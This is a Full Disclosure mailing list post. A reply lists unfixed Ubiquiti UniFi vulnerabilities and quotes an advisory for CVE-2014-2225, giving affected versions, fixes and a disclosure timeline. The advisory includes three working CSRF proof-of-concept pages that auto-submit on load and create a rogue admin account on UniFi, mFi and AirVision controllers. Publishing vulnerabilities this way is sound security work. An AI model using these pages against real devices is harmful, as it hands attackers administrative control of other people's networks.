Full Disclosure mailing list archives
Re: CVE-2014-2225: Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF)
From: Luca Carettoni <luca.carettoni () ikkisoft com>
Date: Thu, 24 Jul 2014 13:59:22 -0700
This is interesting. Ubiquiti has known about this issue since last year. On 26 Sep 2013, I reported to them the following vulnerabilities affecting UniFi Controller: http://www.ikkisoft.com/stuff/UnifiSecurityBugs_Sep2013.pdf

#1 Insecure Java Random() to generate secret tokens
This was fixed in 3.1.5 as "security enhancements". See http://pastebin.com/Xt0hVCPr for the change log. java.util.Random was used across the entire codebase to generate secret tokens, such as session cookies, AP auth keys and reset tokens. Under some circumstances, it was practical to predict the reset password token and compromise the admin account, which would lead to full compromise of the entire platform.

#2 System-wide Cross-Site Request Forgery
In addition to the PDF detailing the vulns, I shared with them a PoC with the exact same attack. After a few emails trying to explain the criticality of CSRF in this context, I simply gave up.

#3 Change password does not require old password

#4 Frameable response (ClickJacking)

#5 Credentials are saved in plain text within MongoDB

#6 Multiple Cross-Site Scripting vulnerabilities (Stored and Reflected) in /api/, abusing IE content sniffing

As far as I know, these are still open. In addition, I asked them to obtain CVEs for those vulnerabilities. On Oct 30th, they confirmed that they would be disclosed publicly: "Good point about CVE, we'll request an ID and disclose them later. Will also address V2."

I don't think that CVEs have ever been assigned to these issues, nor has Ubiquiti published those details in a security advisory.

Cheers!
@_ikki

On Wed, Jul 23, 2014 at 8:58 PM, Seth Art <sethsec () gmail com> wrote:
-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)

-----------------------------------------
Affected Products/Versions:
-----------------------------------------
UniFi Controller v2.4.6
mFi Controller v2.0.15
AirVision Controller v2.1.3
Note: Previous versions may be affected

-----------------
Description:
-----------------
Title: Cross-site Request Forgery (CSRF)
CVE: CVE-2014-2225
CWE: http://cwe.mitre.org/data/definitions/352.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
Researcher: Seth Art - @sethsec

---------------
UniFi POC:
---------------
<html>
<head>
<script>
function sendCSRF() {
  var url_base = "https://192.168.0.106:8443/api/add/admin"
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF() {
  var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

--------------------
AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF() {
  var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
  var post_data="{\"name\":\"csrf\",\"email\":\"csrf () gmail com\",\"userGroup:\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":\"false\"}"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

-------------
Solution:
-------------
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater
(Note: The application name changed from AirVision to UniFi Video)

-----------------------------
Disclosure Timeline:
-----------------------------
2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products
2014-02-17: Ubiquiti acknowledges and requests details
2014-02-17: Report with POC sent to Ubiquiti
2014-02-19: Asked Ubiquiti to confirm receipt of report
2014-02-19: Ubiquiti confirms receipt of report and existence of the vulnerabilities
2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product
2014-02-19: Ubiquiti confirms receipt of AirVision report and existence of the vulnerability
2014-02-28: CVE-2014-2225 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update, mention that we might need to bring in a CERT
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-05-30: Requested a status update on the remaining two products
2014-06-12: Requested a status update on the remaining two products
2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released
2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor
2014-07-24: Public disclosure
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/